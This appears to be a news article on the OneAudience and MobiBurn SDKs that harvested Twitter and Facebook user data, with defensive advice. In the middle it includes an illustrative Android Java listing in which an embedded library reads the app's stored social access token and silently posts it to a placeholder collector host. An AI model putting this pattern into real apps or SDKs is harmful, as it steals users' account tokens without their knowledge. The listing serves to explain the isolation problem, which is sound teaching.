A malicious SDK can be built to scrape and share profile information, email addresses and more.
Twitter and Facebook have warned of software development kits (SDKs) that let third parties access and collect user data without authorization.
On Monday, November 25th, Twitter announced that they had received a report about an SDK made by data analytics platform OneAudience.
An SDK is a software library that app developers embed in their code to handle a common task such as analytics, advertising or social login, which spares them writing and maintaining that code themselves.
SDKs are very popular in the modern app development ecosystem. But embedding an SDK also means handing part of your app's behaviour, and its runtime privileges, to a third party: the library runs inside your app's process, with the same permissions and access to the same stored data as your own code.
The range of exposed data depended on the level of access each user had granted when connecting their social media account to an app that embedded the SDK.
“This issue is not due to a vulnerability in Twitter’s software, but rather the lack of isolation between SDKs within an application,” Twitter explained.
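To make the isolation point concrete, here is an illustration written for this page. It is not code from OneAudience, MobiBurn, Twitter or Facebook, and it does not claim to show how either real SDK behaved; the class names, preference file name, keys and collector URL are all assumptions. On Android, a library compiled into an app runs in the app's process, under the app's Linux UID and with the app's permissions, so a file the app marks MODE_PRIVATE is private with respect to other apps, not with respect to another library inside the same app:

```java
import android.content.Context;
import android.content.SharedPreferences;

import java.io.IOException;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLEncoder;

// Host app side (assumed names). After a social login flow the app keeps the
// user's access token in its private SharedPreferences.
final class SessionStore {
    static final String PREFS_FILE = "social_session";   // assumed file name
    static final String KEY_TOKEN = "access_token";      // assumed key

    static void save(Context ctx, String accessToken) {
        // MODE_PRIVATE keeps the file away from *other apps* (different UID).
        // It does nothing to keep it away from code inside this app.
        ctx.getSharedPreferences(PREFS_FILE, Context.MODE_PRIVATE)
           .edit()
           .putString(KEY_TOKEN, accessToken)
           .apply();
    }
}

// Third-party library compiled into the same APK (illustrative, not any real
// SDK). The app calls init() once and hands over its Context, exactly as it
// would for a legitimate analytics SDK. Because the library executes in the
// app's process it can open the very same private file.
final class AnalyticsSdk {
    // Placeholder collector endpoint for this illustration, not a real host.
    private static final String COLLECTOR = "https://collector.example/v1/session";

    static void init(Context ctx) {
        SharedPreferences prefs =
            ctx.getSharedPreferences("social_session", Context.MODE_PRIVATE);
        final String token = prefs.getString("access_token", null);
        if (token == null) {
            return; // user has not linked a social account
        }
        // Android forbids network I/O on the main thread, so send from a
        // background thread. Whoever holds the token can call every account
        // endpoint the user authorised the app for (profile, email, posts).
        new Thread(new Runnable() {
            @Override public void run() { post(token); }
        }).start();
    }

    private static void post(String token) {
        try {
            HttpURLConnection c = (HttpURLConnection) new URL(COLLECTOR).openConnection();
            c.setRequestMethod("POST");
            c.setDoOutput(true);
            c.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
            byte[] body = ("token=" + URLEncoder.encode(token, "UTF-8")).getBytes("UTF-8");
            try (OutputStream out = c.getOutputStream()) {
                out.write(body);
            }
            c.getResponseCode(); // fire and forget; response is irrelevant here
            c.disconnect();
        } catch (IOException ignored) {
            // a real library would retry; not relevant to the isolation point
        }
    }
}
```

Nothing in the platform lets the app developer fence one library off from another within the process, so the practical controls sit elsewhere: vet which SDKs you ship, request only the login scopes the app actually needs so that a stolen token is worth less, and, on the user side, review and revoke the apps authorised on your social accounts, which is exactly what Twitter recommended.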
Collected information included email, username and last tweet. Twitter didn't say how many users were impacted, but it did say that only Android users were known to be affected.
Twitter has notified both Google and Apple about the malicious SDKs. It also advised users to avoid downloading apps from third-party app stores and to periodically review the apps authorized to access their accounts.
The same issue also impacted Facebook, which found data-harvesting functionality in two SDKs: the same OneAudience SDK and an SDK from the data monetization platform MobiBurn.
The collection worked the same way as in the Twitter case.
From Facebook accounts, the two SDKs could have surreptitiously collected data such as name, email and gender, Facebook said.
Facebook and Twitter are planning to notify people whose information was likely shared.
After the news broke yesterday, both SDK makers posted statements on their websites saying they only provided the tools and were not themselves involved in collecting data. They also shut down the SDKs and the websites associated with them.